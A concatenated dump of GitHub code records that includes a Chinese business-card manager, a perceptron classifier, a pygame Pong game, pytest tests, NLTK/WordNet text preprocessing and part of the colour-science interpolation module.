count+=1","repo_name":"Rinki8890/PythonTrial","sub_path":"WordLadderITr.py","file_name":"WordLadderITr.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28598367055","text":"adminAccount = \"123456\"\nadminPwd = \"123456\"\nlist = []\n\n#新增\ndef add():\t\n\tdic = {}\n\tname = input(\"请输入姓名\")\n\tage = input(\"请输入年龄\")\n\tsex = input(\"请输入性别\")\n\tjob = input(\"请输入工作\")\n\tloction = input(\"请输入地址\")\n\tdic[\"name\"] = name\n\tdic[\"age\"] = age\n\tdic[\"sex\"] = sex \n\tdic[\"job\"] = job\n\tdic[\"loction\"] = loction \n\tlist.append(dic)\n\n#删除\ndef remove():\n\tname = input(\"请输入您要删除的名字\")\t\n\tfor i in range(0,len(list)):\n\t\tif list[i] [\"name\"] == name:\n\t\t\tlist.pop(i)\n\t\t\tbreak\n\n\n\n#修改\ndef chage():\n\tname = input(\"请输入你要修改的名字\")\n\tisShow = True\n\tfor i in range(0,len(list)):\n\t\tif list[i] [\"name\"] == name:\n\t\t\tchageContent(i)\n\t\t\tisShow = false\n\t\t\tbreak\n\telse:\n\t\tif isShow:\n\t\t\tprint(\"你输入的人不存在\")\n\n\n\ndef changeContent(position):\n\tisloop = True\n\twhile isloop:\n\t\tmode = int(input(\" 请输入要输入的信息: 1.名字 2.年龄 3.性别 4.工作 5.地址 6.退出\"))\n\t\t\n\t\tif mode == 1:\n\t\t\tname = input(\"请输入新的名字\")\n\t\t\tlist[position][\"name\"] = name\n\t\telif mode == 2:\n\t\t\tage = input(\"请输入新的年龄\") \n\t\t\tlist[position][\"age\"] = age\n\t\telif mode == 3:\n\t\t\tsex = input(\"请输入新的性别\")\n\t\t\tlist[position][\"sex\"] = sex\n\t\telif mode == 4:\n\t\t\tjob = input(\"请输入新的工作\")\n\t\t\tlist[position][\"job\"] = job\n\t\telif mode == 5:\n\t\t\tloction = input(\"请输入新的地址\")\n\t\t\tlist[position][\"loction\"] = loction\n\t\telif mode == 6:\n\t\t\tisloop = Flase\n\n\n#查询\ndef find():\n\tfor i in list:\n\t\tprint(i)\n\n\n\ndef showMenu():\n\twhile True:\n\t\tprint(\"欢迎进入名片管理系统\".center(30,\"*\"))\n\t\tprint(\"a. 新增名片\".center(30,\"-\"))\t\n\t\tprint(\"b. 查询名片\".center(30,\"-\"))\n\t\tprint(\"c. 修改名片\".center(30,\"-\"))\n\t\tprint(\"d. 删除名片\".center(30,\"-\"))\n\t\tprint(\"e. 退 出\".center(30,\"-\"))\n\t\tmode = int(input(\"请选择功能序号\"))\n\t\tif mode == 1:\n\t\t\tadd()\n\t\telif mode == 2:\n\t\t\tfind()\n\t\telif mode == 3:\n\t\t\tchange()\n\t\telif mode == 4:\n\t\t\tremove()\n\t\telif mode == 5:\n\t\t\tpass\n\n\n\ndef adminLogin():\n\taccount = input(\"请输入管理员帐号:\")\n\tpwd = input(\"请输入管理员密码:\")\n\t\n\t\n\tif account != adminAcount or pwd != adminPwd:\n\t\tprint(\"账户或密码错误\")\n\t\n\telif account == adminAccount and pwd == adminPwd:\n\t\tprint(\"管理登录成功\")\n\t\tshowMenu()\n\n\n\nadminLogin() \n\n\n\n","repo_name":"dudengjin/python","sub_path":"名片管理1.py","file_name":"名片管理1.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35731001591","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef vectorxvector(v,y):\n\ts = 0\n\tfor n in xrange(len(v)):\n\t\ts += v[n] * y[n]\n\treturn s\n\t\ndef vectorxconstant(v,a):\n\treturn [x*a for x in v]\n\ndef vectordifference(v,y):\n\treturn [v[n]-y[n] for n in xrange(len(v))]\n\ndef vectorsum(v,y):\n\treturn [v[n]+y[n] for n in xrange(len(v))]\t\n\ndef classify(learnSamples,recognizementSample,b=0.00001,alpha=0.00001,maxLimit=1000):\n\tm = 0;\n\tc = 0;\n\tweightVectors = []\n\tfor i in xrange(2): weightVectors.append([0 for x in xrange(len(learnSamples[0]))])\n\twhile(m g):\n\t\t\t\t\t\tweightVectors[j] = vectordifference(weightVectors[j],vectorxconstant(learnSamples[n][0],alpha))\n\t\t\t\t\t\terror = True\n\t\t\tif error: weightVectors[i] = vectorsum(weightVectors[i],vectorxconstant(learnSamples[n][0],alpha))\n\t\t\telse: m += 1\t\n\trecognizeds = []\n\tmaxim,i = -float('inf'),0\n\tfor iv in xrange(len(weightVectors)):\n\t\tprod = vectorxvector(weightVectors[iv],recognizementSample)\n\t\tif prod > maxim:\n\t\t\tmaxim = prod\n\t\t\ti = iv\n\tif i==0: i=-1\n\treturn i\n\t\ndef __str__(): return \"Perceptron classifier\"\n\n\"\"\"if __name__ == '__main__':\n\tlearnSamples = [([1,1],-1),([2,2],1),([0.5,0.7],1)]\n\trecognizementSample = [-5,-7]\n\tprint classify(learnSamples,recognizementSample)\n\t#recognizeds = perceptron_recognizement()\t\t\n\t#plotSamplesRecognizeds(recognizeds)\n\"\"\"\n","repo_name":"jogonba2/AdaBoost","sub_path":"Classifiers/Perceptron.py","file_name":"Perceptron.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"34268142100","text":"import pygame\nimport random\n\npygame.init()\n\nelementPair = 1\nchoice = int(input(\"Enter your choice: 1 for Smash and Flash and 2 for Ball Clone\"))\n\nif choice == 1:\n elementPair = 1\nelif choice == 2:\n elementPair = 2\n\n#Initial window\nWIDTH, HEIGHT = 1000, 600\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\n#Change the pygame window name\npygame.display.set_caption(\"Pongg\")\nrun = True \n\n#Player Score Variable\nplayerOne = 0\nplayerTwo = 0\n\n#Ball Direction\ndirection = [0,1]\n#Ball Angles \nangles = [0,1,2]\n#Ball Color\nWHITE = (255,255,255)\n#Ball ReDraw\nBLACK = (0,0,0)\n#Smash Element Indicator\nRED = (255,0,0)\n#Ball Position on window\nradius = 15\nball_x = WIDTH/2 - radius\nball_y = HEIGHT/2 - radius\n#Ball Movement\nballVelocityX = 1\nballVelocityY = 1\n#Cloning Ball Postion and Movement\ncloneBall_x = WIDTH/2 - radius\ncloneBall_y = HEIGHT/2 - radius\ncloneBallVelocityX = 1\ncloneBallVelocityY = 1\n\n#Paddle Positions and Dimensions \npaddleWidth = 20\npaddleHeight = 120\n#Left Paddle\nleftPaddleX = 100 - paddleWidth/2\nleftPaddleY = HEIGHT/2 - paddleHeight/2\n#Right Paddle\nrightPaddleX = WIDTH - (100 - paddleWidth/2)\nrightPaddleY = HEIGHT/2 - paddleHeight/2\n#Paddle Velocity\nrightPaddleVelocity = 0\nleftPaddleVelocity = 0\n\n#Smash Element Variables\nleftSmashElement = 0\nrightSmashElement = 0\nleftSmashElementRemaining = 3\nrightSmashElementRemaining = 3\n\n#Flash Element Variables\nleftFlashElement = 0\nrightFlashElement = 0\nleftFlashElementRemaining = 3\nrightFlashElementRemaining = 3\n\n#Clone Element Variable\nleftCloneElement = 0\nrightCloneElement = 0\nleftCloneElementRemaining = 3\nrightCloneElementRemaining = 3\n\nwhile run: \n #Make the ball look like it is moving by removing the previous position and redrawing the new position\n window.fill(BLACK)\n #This stores all the events that the user inputs - example is the quite but \n #Code below is main loop\n for i in pygame.event.get():\n print (i)\n if i.type == pygame.QUIT:\n run = False\n #Check keystrokes\n #Right paddles\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_UP:\n rightPaddleVelocity = -4\n if i.key == pygame.K_DOWN:\n rightPaddleVelocity = 4\n #Smash Element Activation\n if i.key == pygame.K_RIGHT and rightSmashElementRemaining > 0:\n rightSmashElement = 1\n #Flash Element Activation Right Paddle\n # \n if i.key == pygame.K_RIGHT and rightFlashElementRemaining > 0:\n rightFlashElement = 1\n #\n #Left Paddle\n if i.key == pygame.K_w:\n leftPaddleVelocity = -4\n if i.key == pygame.K_s:\n leftPaddleVelocity = 4\n #Smash Element Activiation\n if i.key == pygame.K_d and leftSmashElementRemaining > 0:\n leftSmashElement = 1\n #Flash Element Activation Left Paddle\n #\n if i.key == pygame.K_a and leftFlashElementRemaining > 0:\n leftFlashElement = 1\n #\n \n if i.type == pygame.KEYUP:\n rightPaddleVelocity = 0\n leftPaddleVelocity = 0\n\n \n #Ball movement controls\n #Create conditionals to check it the balls position is at y=0 or y=600\n if ball_y <= 0 + radius or ball_y >= HEIGHT - radius:\n ballVelocityY *= -1\n if cloneBall_y <= 0 + radius or cloneBall_y >= HEIGHT - radius:\n cloneBallVelocityY *= -1\n #Player turns\n if ball_x >= WIDTH - radius:\n #If the ball goes off the screen from the right\n #hand side the player on the left gets the point\n playerOne += 1\n ball_x = WIDTH/2 - radius\n ball_y = HEIGHT/2 - radius\n #Retrieve the position for the cloned ball\n cloneBall_x = WIDTH/2 - radius\n cloneBall_y = HEIGHT/2 - radius\n randomDirection = random.choice(direction)\n randomAngles = random.choice(angles)\n #Up Direction\n if randomDirection == 0:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = -1.4\n # Clone Ball Directions\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = -0.7\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallallVelocityY = -0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = -0.7\n # Clone Ball Direction\n cloneBallVelocityX = 1.4\n cloneBallallVelocityY = -0.7\n #Down Direction\n if randomDirection == 1:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = 1.4\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = 0.7\n # Clone Ball Direction\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = 0.7\n # Clone Ball Direction\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = 0.7\n ballVelocityX *= -1\n # Change the direction of the clone ball\n cloneBallVelocityX *= -1\n\n if ball_x <= 0 + radius:\n #Ball goes off the screen on the left hand side the player on the \n #right hand side gets the points\n playerTwo += 1\n ball_x = WIDTH/2 - radius\n ball_y = HEIGHT/2 - radius\n #Clone Ball\n cloneBall_x = WIDTH/2 - radius\n cloneBall_y = HEIGHT/2 - radius\n randomDirection = random.choice(direction)\n randomAngles = random.choice(angles)\n #Up Direction\n if randomDirection == 0:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = -1.4\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = -1\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = -1\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = -0.7\n #Clone\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = -0.7\n #Down Direction\n if randomDirection == 1:\n if randomAngles == 0:\n ballVelocityX = 0.7\n ballVelocityY = 1.4\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 1.4\n if randomAngles == 1:\n ballVelocityX = 0.7\n ballVelocityY = 0.7\n #Clone\n cloneBallVelocityX = 0.7\n cloneBallVelocityY = 0.7\n if randomAngles == 2:\n ballVelocityX = 1.4\n ballVelocityY = 0.7\n #Clone\n cloneBallVelocityX = 1.4\n cloneBallVelocityY = 0.7\n #Paddle Movement Controls\n if leftPaddleY >= HEIGHT - paddleHeight:\n leftPaddleY = HEIGHT - paddleHeight\n if leftPaddleY <= 0:\n leftPaddleY = 0\n if rightPaddleY >= HEIGHT - paddleHeight:\n rightPaddleY = HEIGHT - paddleHeight\n if rightPaddleY <= 0:\n rightPaddleY = 0\n \n #Left Paddle Collision\n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n cloneBall_x = leftPaddleX + paddleWidth\n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n\n #Right Paddle Collision\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX\n cloneBall_x = rightPaddleX \n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n \n #Smash Element Active For Left Paddle\n if leftSmashElement == 1:\n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n ballVelocityX *= -3.5\n cloneBallVelocityX *= -3.5\n leftSmashElement = 0\n leftSmashElementRemaining -= 1\n #Flash Element Active For Left Paddle\n if leftFlashElement == 1:\n leftPaddleY = ball_y - paddleHeight // 2\n leftFlashElement = 0\n leftFlashElementRemaining -= 1\n #\n #\n\n #Smash Element Active For Right Paddle \n if elementPair == 1:\n if rightSmashElement == 1:\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX \n ballVelocityX *= -3.5\n cloneBallVelocityX *= -3.5\n rightSmashElement = 0\n leftSmashElementRemaining -= 1\n #Flash Element Active For Right Paddle\n if rightFlashElement == 1:\n leftPaddleY = ball_y - paddleHeight // 2\n rightFlashElement = 0\n rightFlashElementRemaining -= 1\n #\n #\n #\n elif elementPair == 2:\n if leftCloneElement == 1: \n if leftPaddleX <= ball_x <= leftPaddleX + paddleWidth:\n if leftPaddleY <= ball_y <= leftPaddleY + paddleHeight:\n ball_x = leftPaddleX + paddleWidth\n loneBall_x = leftPaddleX + paddleWidth\n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n cloneBallVelocityY *= -1\n leftCloneElement = 0\n leftCloneElementRemaining -= 1\n\n if rightCloneElement == 1:\n if rightPaddleX <= ball_x <= rightPaddleX + paddleWidth:\n if rightPaddleY <= ball_y <= rightPaddleY + paddleHeight:\n ball_x = rightPaddleX\n cloneBall_x = rightPaddleX \n ballVelocityX *= -1\n cloneBallVelocityX *= -1\n cloneBallVelocityY *= -1\n rightCloneElement = 0\n rightCloneElementRemaining -= 1\n\n\n #Movement Section\n ball_x += ballVelocityX\n ball_y += ballVelocityY\n cloneBall_x += cloneBallVelocityX\n cloneBall_y += cloneBallVelocityY\n rightPaddleY += rightPaddleVelocity\n leftPaddleY += leftPaddleVelocity\n\n #Scoreboard\n font = pygame.font.SysFont('callibri', 32)\n scoreOne = font.render(\"Player One: \" + str(playerOne), True, WHITE)\n window.blit(scoreOne, (25,25))\n scoreTwo = font.render(\"Player One: \" + str(playerOne), True, WHITE)\n window.blit(scoreTwo, (825,25))\n playerSmashOne = font.render(\"Smash Power: \" + str(leftSmashElementRemaining), True, WHITE)\n window.blit(playerSmashOne, (25, 65))\n playerSmashTwo = font.render(\"Smash Power: \" + str(rightSmashElementRemaining), True, WHITE)\n window.blit(playerSmashOne, (825, 65))\n playerFlashOne = font.render(\"Flash Power: \" + str(leftFlashElementRemaining), True, WHITE)\n window.blit(playerFlashOne, (25, 105))\n playerFlashTwo = font.render(\"Flash Power: \" + str(rightFlashElementRemaining), True, WHITE)\n window.blit(playerFlashTwo, (825, 105))\n\n #Draw pygame objects with pygame.draw...\n #Draw Ball\n pygame.draw.circle(window, WHITE, (ball_x, ball_y), radius)\n #Draw Paddles\n pygame.draw.rect(window, WHITE, pygame.Rect(leftPaddleX, leftPaddleY, paddleWidth, paddleHeight))\n pygame.draw.rect(window, WHITE, pygame.Rect(rightPaddleX, rightPaddleY, paddleWidth, paddleHeight))\n #Draw Clone Ball\n pygame.draw.circle(window, WHITE, (cloneBall_x, cloneBall_y), radius)\n #Smash Element Indicator (little red circle on each paddle)\n if leftSmashElement == 1:\n pygame.draw.circle(window, RED, (leftPaddleX + 10, leftPaddleY + 10), 4)\n if rightSmashElement == 1:\n pygame.draw.circle(window, RED, (rightPaddleX + 10, rightPaddleY + 10), 4) \n #To see ojects in the window we must update the display\n\n #END GAME!!!!!\n winningFont = pygame.font.SysFont('callibri', 100)\n if playerOne >= 3:\n window.fill(BLACK)\n endscreen = winningFont.render(\"Player One: WINNER\", True, WHITE)\n window.blit(endscreen, (200, 250))\n if playerTwo >= 3:\n window.fill(BLACK)\n endscreen = winningFont.render(\"Player Two: WINNER\", True, WHITE)\n window.blit(endscreen, (200, 250))\n pygame.display.update()","repo_name":"diegoIsBuilding/pongWithPythonAndPyGame","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":13002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20511110875","text":"\nimport pytest\n\nfrom pyunfold.teststat import get_ts, TEST_STATISTICS\n\n\n@pytest.mark.parametrize('name', TEST_STATISTICS.keys())\ndef test_get_ts(name):\n assert get_ts(name) in TEST_STATISTICS.values()\n\n\ndef test_get_ts_raises():\n name = 'not a valid ts'\n with pytest.raises(ValueError) as excinfo:\n get_ts(name)\n\n expected_msg = ('Invalid test statistic, {}, entered. Must be '\n 'in {}'.format(name, TEST_STATISTICS.keys()))\n assert expected_msg == str(excinfo.value)\n\n\n@pytest.mark.parametrize('ts', TEST_STATISTICS.keys())\ndef test_ts_calc(ts, example_dataset):\n # Regression test for issue #92\n ts_obj = get_ts(ts)\n ts_func = ts_obj(tol=0.01,\n num_causes=len(example_dataset.data),\n TestRange=[0, 1e2],\n verbose=False)\n ts_func.calc(example_dataset.data, example_dataset.data + 1)\n","repo_name":"jrbourbeau/pyunfold","sub_path":"pyunfold/tests/test_teststat.py","file_name":"test_teststat.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"30090784524","text":"try:\n #提示输入一个整数\n num=int(input(\"输入一个整数\"))\n result=8/num\n\n print(result)\nexcept ValueError:\n print(\"输入整数\")\nexcept ZeroDivisionError:\n print(\"除0错误\")\n#捕获未知错误\n#因为不可能预判到所有的错误类型。\nexcept Exception as ex:\n print(\"未知错误%s\" % ex)","repo_name":"wanggl617/python_o","sub_path":"py_16_Exception.py","file_name":"py_16_Exception.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5029082015","text":"import nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import wordnet as wn\nimport codecs\nfrom neo4jrestclient.client import GraphDatabase\n\n# //-----------------------------------------------Global variable-------------------------------------------------------\\\\\ndb = GraphDatabase(\"http://localhost:7474\", username=\"boyan\", password=\"boy123\")\nwn_lemmas = set(wn.all_lemma_names()) # untuk pengecekkan kata apabila tidak ada pada wordnet\n\n# //-----------------------------------------------Function-------------------------------------------------------\\\\\ndef open_file(text) :\n with codecs.open(text, 'r', encoding='utf8') as f:\n source_text = f.read()\n # print(source_text)\n return source_text\n\ndef sentences(source_text) :\n # if source_text == None\n # print(\"File not found\")\n # exit()\n # else\n sentence_list = sent_tokenize(source_text)\n # print(sentence_list)\n return sentence_list\n\ndef candidate_set(source_text) :\n # if source_text == None\n # print(\"File not found\")\n # exit()\n # else\n list_postag = nltk.pos_tag(word_tokenize(source_text))\n #print(list_postag)\n nouns = [token for token, pos in list_postag if pos.startswith('N')]\n return nouns\n #print('Candidate Set : \\n', nouns)\n\n# print(sentences(open_file('source.txt')))\n# print(word_tokenize(open_file('source.txt')))\n# print(candidate_set(open_file('source.txt')))\n\n# -------------Penambahan informasi letak kalimat dengan kata yang ada di anggota candidate set----------------------\n# sent_list = sentences(open_file('source.txt'))\n# nouns = [[], []]\n# for idx, sentence in enumerate(sent_list):\n# for word, pos in nltk.pos_tag(nltk.word_tokenize(str(sentence))):\n# if (pos == 'NN' or pos == 'NNP' or pos == 'NNS' or pos == 'NNPS'):\n# nouns[0].append(word)\n# nouns[1].append(idx)\n\n# for idx, val in enumerate(nouns[0]):\n# print('kata', '\"', nouns[0][idx], '\"', 'terdapat pada kalimat : ', sent_list[nouns[1][idx]] )\n# print(nouns[0][1], nouns[1][1], sent_list[1])\n\n# //-----------------------------------------------SENSE_KATA-------------------------------------------------------\\\\\n\n# candidate = candidate_set(open_file('source2.txt'))\n# print(candidate)\n# i = 0\n# list_sense = {}\n# while i < len(nouns):\n# for ss in wn.synsets(nouns[i], pos='n'):\n# list_sense = {\n# \"noun\": nouns[i],\n# \"synset\": ss.name(),\n# \"lemma\": ss.lemma_names(),\n# \"definition\": ss.definition(),\n# \"hypernyms\": ss.hypernyms()\n# }\n# print(list_sense)\n# i += 1\n\n# //------------------- PENGECEKKAN KATA YANG ADA PADA LEMMA SYNSET\n\ndef identifikasiSyn(word, word1): # Output berupa boolean apakah dua kata tersebut terikat synonim atau tidak\n # if word in wn_lemmas:\n # if word1 in wn_lemmas:\n for ss in wn.synsets(word, pos='n'): #pos='n' untuk mengambil synset yang merupakan noun (karena ada dua yaitu noun dan verb)\n lemmas = ss.lemmas()\n for l in lemmas:\n if l.name() == word1:\n return True\n # else:\n # return False\n\ndef identifikasiHip(word, word1): # Output berupa nilai terbesar dari semua nilai hipernim dari dua kata\n value = []\n # if word in wn_lemmas:\n # if word1 in wn_lemmas:\n for s1 in wn.synsets(word, pos='n'):\n # print(s1)\n for s2 in wn.synsets(word1, pos='n'):\n # print(s2)\n similarity = wn.path_similarity(s1, s2)\n value.append(similarity)\n # print('value', s1, 'and', s2, '=', similarity)\n return max(value)\n # else:\n # return 0\n\n# //------------------- CARA AMBIL MERONIM/HOLONIM\n# car = wn.synset('car.n.01')\n# cc = car.part_meronyms()\n# # print(cc)\n# for synset in cc:\n# print(synset.name().split('.')[0])\n\n# //------------------- MENGIDENTIFIKASI SHORTEST PATH DAN INTERSECTION DARI SYNSET DEFINITIOIN\n#person = wn.synset('person.n.01')\n#machine = wn.synset('machine.n.02')\n#tax_dis = person.shortest_path_distance(machine)\n#comm_lemmas = len(set(person.lemma_names()).intersection(set(machine.definition())))\n\n# //--------------------------------------------- MAIN_FUNCTION -----------------------------------------------------\\\\\n\ncandidate = ['Mr.', 'person', 'machine', 'device', 'individual', 'car']\n# print(identifikasiHip('Kenny', 'python'))\n# print(candidate)\n\n# //---------------------- Node dibuat berdasarkan anggota candidate set\n# word = db.labels.create(\"Word\")\n# for noun in candidate:\n# if noun in wn_lemmas:\n # print(noun)\n # word.add(db.nodes.create(word=noun))\n# Node dibuat berdasarkan anggota candidate set ----------------------\\\\\n\n\n# //---------------------- Pengecekkan Relasi antar 2 kata dan add ke graph\n# i = 0\n# j = 0\n# simiprev = 0\n# while i < (len(candidate)):\n# j = i + 1\n# while j < len(candidate):\n# if identifikasiSyn(candidate[i], candidate[j]) == True:\n# for p in word.get(word=candidate[i]):\n# for w2 in word.get(word=candidate[j]):\n# p.Syno(w2)\n# print('add syno success')\n# # print(candidate[i], 'to', candidate[j], 'is Synonim adding Succes')\n# elif 0 < identifikasiHip(candidate[i], candidate[j]) <= 1:\n# similarity = identifikasiHip(candidate[i], candidate[j])\n# # if similarity != 0:\n# if simiprev <= similarity:\n# for p in word.get(word=candidate[i]):\n# for w2 in word.get(word=candidate[j]):\n# p.Hypo_Hype(w2)\n# w2.Hypo_Hype(p)\n# print('add hypo_hype success')\n# simiprev = similarity\n# # print(candidate[i], 'to', candidate[j], 'is Hipernim', '[value = ', similarity, '] adding Succes')\n# j += 1\n# i += 1\n# Pengecekkan Relasi antar 2 kata dan add ke graph ----------------------\\\\\n","repo_name":"mocharief/LexicalChainSumm_TA","sub_path":"preprocessing_text.py","file_name":"preprocessing_text.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36873267049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInterpolation\n=============\n\nDefines classes for interpolating variables.\n\n- :class:`LinearInterpolator`: 1-D function linear interpolation.\n- :class:`SpragueInterpolator`: 1-D function fifth-order polynomial\n interpolation using *Sprague (1880)* method.\n- :class:`CubicSplineInterpolator`: 1-D function cubic spline interpolation.\n- :class:`PchipInterpolator`: 1-D function piecewise cube Hermite\n interpolation.\n- :func:`lagrange_coefficients`: Computation of *Lagrange Coefficients*.\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\nimport scipy.interpolate\nfrom six.moves import reduce\n\nfrom colour.utilities import as_numeric, interval\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2013-2016 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['LinearInterpolator',\n 'SpragueInterpolator',\n 'CubicSplineInterpolator',\n 'PchipInterpolator',\n 'lagrange_coefficients']\n\n\nclass LinearInterpolator(object):\n \"\"\"\n Linearly interpolates a 1-D function.\n\n Parameters\n ----------\n x : ndarray\n Independent :math:`x` variable values corresponding with :math:`y`\n variable.\n y : ndarray\n Dependent and already known :math:`y` variable values to\n interpolate.\n\n Methods\n -------\n __call__\n\n Notes\n -----\n This class is a wrapper around *numpy.interp* definition.\n\n See Also\n --------\n SpragueInterpolator\n\n Examples\n --------\n Interpolating a single numeric variable:\n\n >>> y = np.array([5.9200,\n ... 9.3700,\n ... 10.8135,\n ... 4.5100,\n ... 69.5900,\n ... 27.8007,\n ... 86.0500])\n >>> x = np.arange(len(y))\n >>> f = LinearInterpolator(x, y)\n >>> # Doctests ellipsis for Python 2.x compatibility.\n >>> f(0.5) # doctest: +ELLIPSIS\n 7.64...\n\n Interpolating an *array_like* variable:\n\n >>> f([0.25, 0.75])\n array([ 6.7825, 8.5075])\n \"\"\"\n\n def __init__(self, x=None, y=None):\n self.__x = None\n self.x = x\n self.__y = None\n self.y = y\n\n self._validate_dimensions()\n\n @property\n def x(self):\n \"\"\"\n Property for **self.__x** private attribute.\n\n Returns\n -------\n array_like\n self.__x\n \"\"\"\n\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Setter for **self.__x** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"x\" independent variable must have exactly one dimension!')\n\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"y\" dependent variable must have exactly one dimension!')\n\n self.__y = value\n\n def __call__(self, x):\n \"\"\"\n Evaluates the interpolating polynomial at given point(s).\n\n\n Parameters\n ----------\n x : numeric or array_like\n Point(s) to evaluate the interpolant at.\n\n Returns\n -------\n float or ndarray\n Interpolated value(s).\n \"\"\"\n\n x = np.atleast_1d(x).astype(np.float_)\n\n xi = as_numeric(self._evaluate(x))\n\n return xi\n\n def _evaluate(self, x):\n \"\"\"\n Performs the interpolating polynomial evaluation at given points.\n\n Parameters\n ----------\n x : ndarray\n Points to evaluate the interpolant at.\n\n Returns\n -------\n ndarray\n Interpolated points values.\n \"\"\"\n\n self._validate_dimensions()\n self._validate_interpolation_range(x)\n\n return np.interp(x, self.__x, self.__y)\n\n def _validate_dimensions(self):\n \"\"\"\n Validates variables dimensions to be the same.\n \"\"\"\n\n if len(self.__x) != len(self.__y):\n raise ValueError(\n ('\"x\" independent and \"y\" dependent variables have different '\n 'dimensions: \"{0}\", \"{1}\"').format(len(self.__x),\n len(self.__y)))\n\n def _validate_interpolation_range(self, x):\n \"\"\"\n Validates given point to be in interpolation range.\n \"\"\"\n\n below_interpolation_range = x < self.__x[0]\n above_interpolation_range = x > self.__x[-1]\n\n if below_interpolation_range.any():\n raise ValueError('\"{0}\" is below interpolation range.'.format(x))\n\n if above_interpolation_range.any():\n raise ValueError('\"{0}\" is above interpolation range.'.format(x))\n\n\nclass SpragueInterpolator(object):\n \"\"\"\n Constructs a fifth-order polynomial that passes through :math:`y` dependent\n variable.\n\n *Sprague (1880)* method is recommended by the *CIE* for interpolating\n functions having a uniformly spaced independent variable.\n\n Parameters\n ----------\n x : array_like\n Independent :math:`x` variable values corresponding with :math:`y`\n variable.\n y : array_like\n Dependent and already known :math:`y` variable values to\n interpolate.\n\n Methods\n -------\n __call__\n\n See Also\n --------\n LinearInterpolator\n\n Notes\n -----\n The minimum number :math:`k` of data points required along the\n interpolation axis is :math:`k=6`.\n\n References\n ----------\n .. [1] CIE TC 1-38. (2005). 9.2.4 Method of interpolation for uniformly\n spaced independent variable. In CIE 167:2005 Recommended Practice\n for Tabulating Spectral Data for Use in Colour Computations\n (pp. 1–27). ISBN:978-3-901-90641-1\n .. [2] Westland, S., Ripamonti, C., & Cheung, V. (2012). Interpolation\n Methods. In Computational Colour Science Using MATLAB\n (2nd ed., pp. 29–37). ISBN:978-0-470-66569-5\n\n Examples\n --------\n Interpolating a single numeric variable:\n\n >>> y = np.array([5.9200,\n ... 9.3700,\n ... 10.8135,\n ... 4.5100,\n ... 69.5900,\n ... 27.8007,\n ... 